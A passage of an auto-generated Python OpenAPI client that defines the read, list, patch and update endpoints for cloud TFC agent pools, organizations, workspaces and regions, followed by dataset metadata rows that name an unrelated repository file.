moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcAgentpool
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_agentpool_by_moid = _Endpoint(
settings={
'response_type': (CloudTfcAgentpool,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcAgentpools/{Moid}',
'operation_id': 'get_cloud_tfc_agentpool_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_agentpool_by_moid
)
def __get_cloud_tfc_agentpool_list(
self,
**kwargs
):
"""Read a 'cloud.TfcAgentpool' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_agentpool_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcAgentpoolResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_agentpool_list = _Endpoint(
settings={
'response_type': (CloudTfcAgentpoolResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcAgentpools',
'operation_id': 'get_cloud_tfc_agentpool_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_agentpool_list
)
def __get_cloud_tfc_organization_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.TfcOrganization' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_organization_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcOrganization
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_organization_by_moid = _Endpoint(
settings={
'response_type': (CloudTfcOrganization,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcOrganizations/{Moid}',
'operation_id': 'get_cloud_tfc_organization_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_organization_by_moid
)
def __get_cloud_tfc_organization_list(
self,
**kwargs
):
"""Read a 'cloud.TfcOrganization' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_organization_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcOrganizationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_organization_list = _Endpoint(
settings={
'response_type': (CloudTfcOrganizationResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcOrganizations',
'operation_id': 'get_cloud_tfc_organization_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_organization_list
)
def __get_cloud_tfc_workspace_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.TfcWorkspace' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_workspace_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcWorkspace
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_workspace_by_moid = _Endpoint(
settings={
'response_type': (CloudTfcWorkspace,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcWorkspaces/{Moid}',
'operation_id': 'get_cloud_tfc_workspace_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_workspace_by_moid
)
def __get_cloud_tfc_workspace_list(
self,
**kwargs
):
"""Read a 'cloud.TfcWorkspace' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_workspace_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudTfcWorkspaceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_tfc_workspace_list = _Endpoint(
settings={
'response_type': (CloudTfcWorkspaceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/TfcWorkspaces',
'operation_id': 'get_cloud_tfc_workspace_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_tfc_workspace_list
)
def __patch_cloud_regions(
self,
moid,
cloud_regions,
**kwargs
):
"""Update a 'cloud.Regions' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cloud_regions(moid, cloud_regions, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
cloud_regions (CloudRegions): The 'cloud.Regions' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudRegions
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['cloud_regions'] = \
cloud_regions
return self.call_with_http_info(**kwargs)
self.patch_cloud_regions = _Endpoint(
settings={
'response_type': (CloudRegions,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/Regions/{Moid}',
'operation_id': 'patch_cloud_regions',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'cloud_regions',
'if_match',
],
'required': [
'moid',
'cloud_regions',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'cloud_regions':
(CloudRegions,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'cloud_regions': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_cloud_regions
)
def __update_cloud_regions(
self,
moid,
cloud_regions,
**kwargs
):
"""Update a 'cloud.Regions' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_cloud_regions(moid, cloud_regions, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
cloud_regions (CloudRegions): The 'cloud.Regions' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudRegions
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['cloud_regions'] = \
cloud_regions
return self.call_with_http_info(**kwargs)
self.update_cloud_regions = _Endpoint(
settings={
'response_type': (CloudRegions,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/Regions/{Moid}',
'operation_id': 'update_cloud_regions',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'cloud_regions',
'if_match',
],
'required': [
'moid',
'cloud_regions',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'cloud_regions':
(CloudRegions,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'cloud_regions': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_cloud_regions
)
| 48.94448
| 1,678
| 0.520217
| 30,045
| 308,546
| 5.195573
| 0.020569
| 0.016547
| 0.013658
| 0.014183
| 0.959814
| 0.955804
| 0.942319
| 0.927041
| 0.924152
| 0.923063
| 0
| 0.002563
| 0.404445
| 308,546
| 6,303
| 1,679
| 48.952245
| 0.846938
| 0.457575
| 0
| 0.762032
| 0
| 0
| 0.223986
| 0.052467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009358
| false
| 0
| 0.009804
| 0
| 0.028521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dfdc564deb0868a084cd07a9b8d8cc131a47f798
| 7,846
|
py
|
Python
|
backend/api/migrations/0188_update_roles_permissions.py
|
amichard/tfrs
|
ed3973016cc5c2ae48999d550a23b41a5ddad807
|
[
"Apache-2.0"
] | 18
|
2017-05-10T21:55:11.000Z
|
